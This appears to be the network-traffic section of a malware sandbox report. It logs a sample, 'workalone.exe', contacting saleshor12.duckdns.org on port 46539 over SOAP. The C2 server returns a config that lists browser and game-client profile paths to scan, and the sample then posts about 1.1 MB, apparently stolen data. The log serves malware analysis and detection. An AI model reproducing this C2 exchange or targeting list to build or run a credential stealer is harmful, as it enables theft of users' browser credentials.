Nov 30, 2022 00:08:13.014142036 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.014204979 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.014283895 CET	49688	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:13.014352083 CET	49688	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:13.032402039 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.033026934 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.038069963 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.038235903 CET	49688	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:13.044212103 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.045208931 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.045259953 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.045291901 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.045325041 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.045346975 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.045368910 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.045375109 CET	49688	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:13.045583010 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.045733929 CET	49688	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:13.045821905 CET	49688	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:13.045821905 CET	49688	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:13.052936077 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.053108931 CET	49688	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:13.054532051 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.054557085 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.054791927 CET	49688	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:13.055145979 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.055198908 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.055217981 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.055320024 CET	49688	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:13.055459023 CET	49688	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:13.055519104 CET	49688	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:13.055593967 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.055727005 CET	49688	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:13.055984020 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.056612015 CET	49688	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:13.057365894 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.057524920 CET	49688	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:13.069972038 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.070004940 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.070133924 CET	49688	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:13.073522091 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.073643923 CET	49688	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:13.075541019 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.075692892 CET	49688	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:13.075844049 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.075865030 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.075884104 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.075901985 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.075920105 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.075937986 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.075943947 CET	49688	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:13.075989008 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.076040030 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.076092005 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.076132059 CET	49688	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:13.076172113 CET	49688	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:13.076193094 CET	49688	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:13.078376055 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.078635931 CET	49688	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:13.079792023 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.080667973 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.083374023 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.084194899 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.085100889 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.089322090 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.090193033 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.095987082 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.096184969 CET	49688	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:13.096548080 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.096676111 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.096676111 CET	49688	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:13.096776009 CET	49688	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:13.098565102 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.098602057 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.098613024 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.098624945 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.098638058 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.098653078 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.098668098 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.099039078 CET	49688	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:13.099143028 CET	49688	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:13.099216938 CET	49688	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:13.099268913 CET	49688	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:13.099268913 CET	49688	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:13.102237940 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.102288961 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.102416039 CET	49688	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:13.102452993 CET	49688	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:13.105859041 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.105974913 CET	49688	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:13.106812000 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.106950045 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.106997967 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.107060909 CET	49688	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:13.107129097 CET	49688	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:13.107129097 CET	49688	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:13.107172966 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.107217073 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.107264996 CET	49688	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:13.107317924 CET	49688	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:13.107332945 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.107388020 CET	49688	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:13.108633995 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.108655930 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.108684063 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.108728886 CET	49688	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:13.108840942 CET	49688	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:13.108840942 CET	49688	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:13.127501011 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.127557039 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.127666950 CET	49688	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:13.127743959 CET	49688	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:13.127912045 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.127999067 CET	49688	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:13.128354073 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.128390074 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.128477097 CET	49688	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:13.128477097 CET	49688	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:13.128528118 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.128595114 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.128645897 CET	49688	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:13.128667116 CET	49688	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:13.128669977 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.128765106 CET	49688	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:13.128978968 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.128999949 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.129053116 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.129087925 CET	49688	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:13.129189014 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.129304886 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.129324913 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.129373074 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.130346060 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.130805969 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.130846024 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.130903006 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.131494999 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.131522894 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.131598949 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.131619930 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.132276058 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.132301092 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.132340908 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.132901907 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.133491993 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.133510113 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.133719921 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.133738995 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.134267092 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.134516001 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.134947062 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.134974003 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.138415098 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.138432026 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.138539076 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.138551950 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.138672113 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.138684034 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.139163971 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.139178038 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.139198065 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.139210939 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.157210112 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.157260895 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.157280922 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.157676935 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.157699108 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.157715082 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.157893896 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.158545971 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.158567905 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.158695936 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.158727884 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.158750057 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.159328938 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.159351110 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.159921885 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.159941912 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.160782099 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.187941074 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.318850040 CET	49688	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:13.501327038 CET	49688	46539	192.168.2.3	85.208.136.178

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 30, 2022 00:07:25.575783014 CET	63722	53	192.168.2.3	8.8.8.8
Nov 30, 2022 00:07:25.687061071 CET	53	63722	8.8.8.8	192.168.2.3
Nov 30, 2022 00:07:35.732409954 CET	65522	53	192.168.2.3	8.8.8.8
Nov 30, 2022 00:07:35.763092995 CET	59869	53	192.168.2.3	8.8.8.8
Nov 30, 2022 00:08:07.898642063 CET	54397	53	192.168.2.3	8.8.8.8
Nov 30, 2022 00:08:08.008116007 CET	53	54397	8.8.8.8	192.168.2.3
Nov 30, 2022 00:08:10.978208065 CET	59324	53	192.168.2.3	8.8.8.8
Nov 30, 2022 00:08:11.086960077 CET	53	59324	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 30, 2022 00:07:25.575783014 CET	192.168.2.3	8.8.8.8	0x9fd4	Standard query (0)	saleshor12.duckdns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2022 00:07:35.732409954 CET	192.168.2.3	8.8.8.8	0x7e82	Standard query (0)	api.ip.sb	A (IP address)	IN (0x0001)	false
Nov 30, 2022 00:07:35.763092995 CET	192.168.2.3	8.8.8.8	0x48a3	Standard query (0)	api.ip.sb	A (IP address)	IN (0x0001)	false
Nov 30, 2022 00:08:07.898642063 CET	192.168.2.3	8.8.8.8	0xe5fe	Standard query (0)	saleshor12.duckdns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2022 00:08:10.978208065 CET	192.168.2.3	8.8.8.8	0x3609	Standard query (0)	saleshor12.duckdns.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 30, 2022 00:07:25.687061071 CET	8.8.8.8	192.168.2.3	0x9fd4	No error (0)	saleshor12.duckdns.org		85.208.136.178	A (IP address)	IN (0x0001)	false
Nov 30, 2022 00:07:35.754019976 CET	8.8.8.8	192.168.2.3	0x7e82	No error (0)	api.ip.sb	api.ip.sb.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 30, 2022 00:07:35.783816099 CET	8.8.8.8	192.168.2.3	0x48a3	No error (0)	api.ip.sb	api.ip.sb.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 30, 2022 00:08:08.008116007 CET	8.8.8.8	192.168.2.3	0xe5fe	No error (0)	saleshor12.duckdns.org		85.208.136.178	A (IP address)	IN (0x0001)	false
Nov 30, 2022 00:08:11.086960077 CET	8.8.8.8	192.168.2.3	0x3609	No error (0)	saleshor12.duckdns.org		85.208.136.178	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

saleshor12.duckdns.org:46539

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49685	85.208.136.178	46539	C:\Users\user\Desktop\workalone.exe

Timestamp	kBytes transferred	Direction	Data
Nov 30, 2022 00:07:26.016802073 CET	102	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/CheckConnect" Host: saleshor12.duckdns.org:46539 Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive
Nov 30, 2022 00:07:26.213782072 CET	102	IN	HTTP/1.1 100 Continue
Nov 30, 2022 00:07:26.380656004 CET	103	IN	HTTP/1.1 200 OK Content-Length: 212 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Tue, 29 Nov 2022 23:07:26 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
Nov 30, 2022 00:07:34.937004089 CET	103	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings" Host: saleshor12.duckdns.org:46539 Content-Length: 144 Expect: 100-continue Accept-Encoding: gzip, deflate
Nov 30, 2022 00:07:34.972991943 CET	103	IN	HTTP/1.1 100 Continue
Nov 30, 2022 00:07:35.055725098 CET	104	IN	HTTP/1.1 200 OK Content-Length: 4744 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Tue, 29 Nov 2022 23:07:34 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 4f 62 6a 65 63 74 34 3e 74 72 75 65 3c 2f 61 3a 4f 62 6a 65 63 74 34 3e 3c 61 3a 4f 62 6a 65 63 74 36 3e 66 61 6c 73 65 3c 2f 61 3a 4f 62 6a 65 63 74 36 3e 3c 61 3a 53 63 61 6e 42 72 6f 77 73 65 72 73 3e 74 72 75 65 3c 2f 61 3a 53 63 61 6e 42 72 6f 77 73 65 72 73 3e 3c 61 3a 53 63 61 6e 43 68 72 6f 6d 65 42 72 6f 77 73 65 72 73 50 61 74 68 73 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 42 61 74 74 6c 65 2e 6e 65 74 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 43 68 72 6f 6d 69 75 6d 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 47 6f 6f 67 6c 65 5c 43 68 72 6f 6d 65 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 47 6f 6f 67 6c 65 28 78 38 36 29 5c 43 68 72 6f 6d 65 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 52 6f 61 6d 69 6e 67 5c 4f 70 65 72 61 20 53 6f 66 74 77 61 72 65 5c 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 4d 61 70 6c 65 53 74 75 64 69 6f 5c 43 68 72 6f 6d 65 50 6c 75 73 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 49 72 69 64 69 75 6d 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 37 53 74 61 72 5c 37 53 74 61 72 5c 55 73 65 72 20 44 61 74 61 Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:Object4>true</a:Object4><a:Object6>false</a:Object6><a:ScanBrowsers>true</a:ScanBrowsers><a:ScanChromeBrowsersPaths xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>%USERPROFILE%\AppData\Local\Battle.net</b:string><b:string>%USERPROFILE%\AppData\Local\Chromium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google(x86)\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Roaming\Opera Software\</b:string><b:string>%USERPROFILE%\AppData\Local\MapleStudio\ChromePlus\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Iridium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\7Star\7Star\User Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49687	85.208.136.178	46539	C:\Users\user\Desktop\workalone.exe

Timestamp	kBytes transferred	Direction	Data
Nov 30, 2022 00:08:08.051173925 CET	116	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment" Host: saleshor12.duckdns.org:46539 Content-Length: 1144458 Expect: 100-continue Accept-Encoding: gzip, deflate
Nov 30, 2022 00:08:08.179694891 CET	116	IN	HTTP/1.1 100 Continue
